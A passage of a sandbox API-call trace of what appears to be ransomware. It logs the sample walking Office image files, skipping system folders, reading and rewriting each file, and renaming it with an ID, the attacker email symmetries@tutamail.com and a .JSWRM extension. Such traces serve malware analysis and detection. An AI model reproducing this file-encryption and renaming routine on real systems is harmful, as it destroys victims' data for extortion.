dwFlags=0x0, lpWideCharStr="VisioLogo.contrast-white_scale-140.png", cchWideChar=38, lpMultiByteStr=0x22cdc8, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioLogo.contrast-white_scale-140.png", lpUsedDefaultChar=0x0) returned 38 [0133.845] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioLogo.contrast-white_scale-140.png", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0133.845] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioLogo.contrast-white_scale-140.png", cchWideChar=38, lpMultiByteStr=0x22ce70, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioLogo.contrast-white_scale-140.png", lpUsedDefaultChar=0x0) returned 38 [0133.845] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.845] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.845] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\VisioLogo.contrast-white_scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\visiologo.contrast-white_scale-140.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.845] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3601) returned 1 [0133.845] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.846] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xe10, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xe10, lpOverlapped=0x0) returned 1 [0133.848] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.848] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xe10, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xe10, lpOverlapped=0x0) returned 1 [0133.848] CloseHandle (hObject=0x238) returned 1 [0133.848] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\VisioLogo.contrast-white_scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\visiologo.contrast-white_scale-140.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\VisioLogo.contrast-white_scale-140.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\visiologo.contrast-white_scale-140.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.849] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a79652b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a79652b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a79652b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xf11, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="VisioLogo.contrast-white_scale-180.png", cAlternateFileName="VISIOL~4.PNG")) returned 1 [0133.849] lstrcmpiW (lpString1="VisioLogo.contrast-white_scale-180.png", lpString2=".") returned 1 [0133.849] lstrcmpiW (lpString1="VisioLogo.contrast-white_scale-180.png", lpString2="..") returned 1 [0133.849] lstrcmpiW (lpString1="VisioLogo.contrast-white_scale-180.png", lpString2="...") returned 1 [0133.849] lstrcmpiW (lpString1="VisioLogo.contrast-white_scale-180.png", lpString2="windows") returned -1 [0133.849] lstrcmpiW (lpString1="VisioLogo.contrast-white_scale-180.png", lpString2="recovery") returned 1 [0133.849] lstrcmpiW (lpString1="VisioLogo.contrast-white_scale-180.png", lpString2="perflogs") returned 1 [0133.849] lstrcmpiW (lpString1="VisioLogo.contrast-white_scale-180.png", lpString2="documents and settings") returned 1 [0133.849] lstrcmpiW (lpString1="VisioLogo.contrast-white_scale-180.png", lpString2="$RECYCLE.BIN") returned 1 [0133.849] lstrcmpiW (lpString1="VisioLogo.contrast-white_scale-180.png", lpString2="system volume information") returned 1 [0133.850] lstrcmpiW (lpString1="VisioLogo.contrast-white_scale-180.png", lpString2="msocache") returned 1 [0133.850] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioLogo.contrast-white_scale-180.png", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0133.850] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioLogo.contrast-white_scale-180.png", cchWideChar=38, lpMultiByteStr=0x22cdc8, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioLogo.contrast-white_scale-180.png", lpUsedDefaultChar=0x0) returned 38 [0133.850] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioLogo.contrast-white_scale-180.png", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0133.850] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioLogo.contrast-white_scale-180.png", cchWideChar=38, lpMultiByteStr=0x22d0d8, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioLogo.contrast-white_scale-180.png", lpUsedDefaultChar=0x0) returned 38 [0133.850] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.850] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.850] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\VisioLogo.contrast-white_scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\visiologo.contrast-white_scale-180.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.850] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3857) returned 1 [0133.851] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.851] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xf10, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xf10, lpOverlapped=0x0) returned 1 [0133.852] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.852] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xf10, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xf10, lpOverlapped=0x0) returned 1 [0133.853] CloseHandle (hObject=0x238) returned 1 [0133.853] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\VisioLogo.contrast-white_scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\visiologo.contrast-white_scale-180.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\VisioLogo.contrast-white_scale-180.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\visiologo.contrast-white_scale-180.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.854] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a7bc76a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a7bc76a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a7e29bd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x847, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="VisioLogo.contrast-white_scale-80.png", cAlternateFileName="VI1BD5~1.PNG")) returned 1 [0133.854] lstrcmpiW (lpString1="VisioLogo.contrast-white_scale-80.png", lpString2=".") returned 1 [0133.854] lstrcmpiW (lpString1="VisioLogo.contrast-white_scale-80.png", lpString2="..") returned 1 [0133.854] lstrcmpiW (lpString1="VisioLogo.contrast-white_scale-80.png", lpString2="...") returned 1 [0133.854] lstrcmpiW (lpString1="VisioLogo.contrast-white_scale-80.png", lpString2="windows") returned -1 [0133.854] lstrcmpiW (lpString1="VisioLogo.contrast-white_scale-80.png", lpString2="recovery") returned 1 [0133.854] lstrcmpiW (lpString1="VisioLogo.contrast-white_scale-80.png", lpString2="perflogs") returned 1 [0133.854] lstrcmpiW (lpString1="VisioLogo.contrast-white_scale-80.png", lpString2="documents and settings") returned 1 [0133.854] lstrcmpiW (lpString1="VisioLogo.contrast-white_scale-80.png", lpString2="$RECYCLE.BIN") returned 1 [0133.854] lstrcmpiW (lpString1="VisioLogo.contrast-white_scale-80.png", lpString2="system volume information") returned 1 [0133.854] lstrcmpiW (lpString1="VisioLogo.contrast-white_scale-80.png", lpString2="msocache") returned 1 [0133.854] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioLogo.contrast-white_scale-80.png", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0133.854] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioLogo.contrast-white_scale-80.png", cchWideChar=37, lpMultiByteStr=0x22d0d8, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioLogo.contrast-white_scale-80.png", lpUsedDefaultChar=0x0) returned 37 [0133.854] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioLogo.contrast-white_scale-80.png", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0133.854] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioLogo.contrast-white_scale-80.png", cchWideChar=37, lpMultiByteStr=0x22d260, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioLogo.contrast-white_scale-80.png", lpUsedDefaultChar=0x0) returned 37 [0133.854] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.854] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.854] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\VisioLogo.contrast-white_scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\visiologo.contrast-white_scale-80.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.855] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2119) returned 1 [0133.855] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.855] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x840, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x840, lpOverlapped=0x0) returned 1 [0133.857] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.857] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x840, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x840, lpOverlapped=0x0) returned 1 [0133.857] CloseHandle (hObject=0x238) returned 1 [0133.857] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\VisioLogo.contrast-white_scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\visiologo.contrast-white_scale-80.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\VisioLogo.contrast-white_scale-80.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\visiologo.contrast-white_scale-80.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.858] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a7bc76a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a7bc76a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a7bc76a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x9a8, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="VisioLogo.scale-100.png", cAlternateFileName="VIA47A~1.PNG")) returned 1 [0133.858] lstrcmpiW (lpString1="VisioLogo.scale-100.png", lpString2=".") returned 1 [0133.858] lstrcmpiW (lpString1="VisioLogo.scale-100.png", lpString2="..") returned 1 [0133.858] lstrcmpiW (lpString1="VisioLogo.scale-100.png", lpString2="...") returned 1 [0133.858] lstrcmpiW (lpString1="VisioLogo.scale-100.png", lpString2="windows") returned -1 [0133.858] lstrcmpiW (lpString1="VisioLogo.scale-100.png", lpString2="recovery") returned 1 [0133.858] lstrcmpiW (lpString1="VisioLogo.scale-100.png", lpString2="perflogs") returned 1 [0133.858] lstrcmpiW (lpString1="VisioLogo.scale-100.png", lpString2="documents and settings") returned 1 [0133.858] lstrcmpiW (lpString1="VisioLogo.scale-100.png", lpString2="$RECYCLE.BIN") returned 1 [0133.858] lstrcmpiW (lpString1="VisioLogo.scale-100.png", lpString2="system volume information") returned 1 [0133.858] lstrcmpiW (lpString1="VisioLogo.scale-100.png", lpString2="msocache") returned 1 [0133.858] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioLogo.scale-100.png", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0133.859] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioLogo.scale-100.png", cchWideChar=23, lpMultiByteStr=0x2412e0, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioLogo.scale-100.png", lpUsedDefaultChar=0x0) returned 23 [0133.859] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioLogo.scale-100.png", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0133.859] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioLogo.scale-100.png", cchWideChar=23, lpMultiByteStr=0x241290, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioLogo.scale-100.png", lpUsedDefaultChar=0x0) returned 23 [0133.859] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.859] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.859] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\VisioLogo.scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\visiologo.scale-100.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.859] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2472) returned 1 [0133.859] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.860] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x9a0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x9a0, lpOverlapped=0x0) returned 1 [0133.861] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.861] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x9a0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x9a0, lpOverlapped=0x0) returned 1 [0133.861] CloseHandle (hObject=0x238) returned 1 [0133.861] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\VisioLogo.scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\visiologo.scale-100.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\VisioLogo.scale-100.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\visiologo.scale-100.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.862] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a7bc76a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a7bc76a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a7bc76a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xe69, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="VisioLogo.scale-140.png", cAlternateFileName="VIAD54~1.PNG")) returned 1 [0133.862] lstrcmpiW (lpString1="VisioLogo.scale-140.png", lpString2=".") returned 1 [0133.862] lstrcmpiW (lpString1="VisioLogo.scale-140.png", lpString2="..") returned 1 [0133.862] lstrcmpiW (lpString1="VisioLogo.scale-140.png", lpString2="...") returned 1 [0133.863] lstrcmpiW (lpString1="VisioLogo.scale-140.png", lpString2="windows") returned -1 [0133.863] lstrcmpiW (lpString1="VisioLogo.scale-140.png", lpString2="recovery") returned 1 [0133.863] lstrcmpiW (lpString1="VisioLogo.scale-140.png", lpString2="perflogs") returned 1 [0133.863] lstrcmpiW (lpString1="VisioLogo.scale-140.png", lpString2="documents and settings") returned 1 [0133.863] lstrcmpiW (lpString1="VisioLogo.scale-140.png", lpString2="$RECYCLE.BIN") returned 1 [0133.863] lstrcmpiW (lpString1="VisioLogo.scale-140.png", lpString2="system volume information") returned 1 [0133.863] lstrcmpiW (lpString1="VisioLogo.scale-140.png", lpString2="msocache") returned 1 [0133.863] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioLogo.scale-140.png", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0133.863] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioLogo.scale-140.png", cchWideChar=23, lpMultiByteStr=0x2411c8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioLogo.scale-140.png", lpUsedDefaultChar=0x0) returned 23 [0133.863] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioLogo.scale-140.png", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0133.863] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioLogo.scale-140.png", cchWideChar=23, lpMultiByteStr=0x2410d8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioLogo.scale-140.png", lpUsedDefaultChar=0x0) returned 23 [0133.863] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.863] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.863] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\VisioLogo.scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\visiologo.scale-140.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.864] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3689) returned 1 [0133.864] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.864] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xe60, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xe60, lpOverlapped=0x0) returned 1 [0133.866] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.866] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xe60, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xe60, lpOverlapped=0x0) returned 1 [0133.866] CloseHandle (hObject=0x238) returned 1 [0133.866] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\VisioLogo.scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\visiologo.scale-140.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\VisioLogo.scale-140.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\visiologo.scale-140.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.867] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a7bc76a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a7bc76a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a7bc76a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xee2, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="VisioLogo.scale-180.png", cAlternateFileName="VI20DC~1.PNG")) returned 1 [0133.867] lstrcmpiW (lpString1="VisioLogo.scale-180.png", lpString2=".") returned 1 [0133.867] lstrcmpiW (lpString1="VisioLogo.scale-180.png", lpString2="..") returned 1 [0133.867] lstrcmpiW (lpString1="VisioLogo.scale-180.png", lpString2="...") returned 1 [0133.867] lstrcmpiW (lpString1="VisioLogo.scale-180.png", lpString2="windows") returned -1 [0133.867] lstrcmpiW (lpString1="VisioLogo.scale-180.png", lpString2="recovery") returned 1 [0133.867] lstrcmpiW (lpString1="VisioLogo.scale-180.png", lpString2="perflogs") returned 1 [0133.867] lstrcmpiW (lpString1="VisioLogo.scale-180.png", lpString2="documents and settings") returned 1 [0133.867] lstrcmpiW (lpString1="VisioLogo.scale-180.png", lpString2="$RECYCLE.BIN") returned 1 [0133.867] lstrcmpiW (lpString1="VisioLogo.scale-180.png", lpString2="system volume information") returned 1 [0133.867] lstrcmpiW (lpString1="VisioLogo.scale-180.png", lpString2="msocache") returned 1 [0133.867] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioLogo.scale-180.png", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0133.867] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioLogo.scale-180.png", cchWideChar=23, lpMultiByteStr=0x241308, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioLogo.scale-180.png", lpUsedDefaultChar=0x0) returned 23 [0133.867] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioLogo.scale-180.png", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, 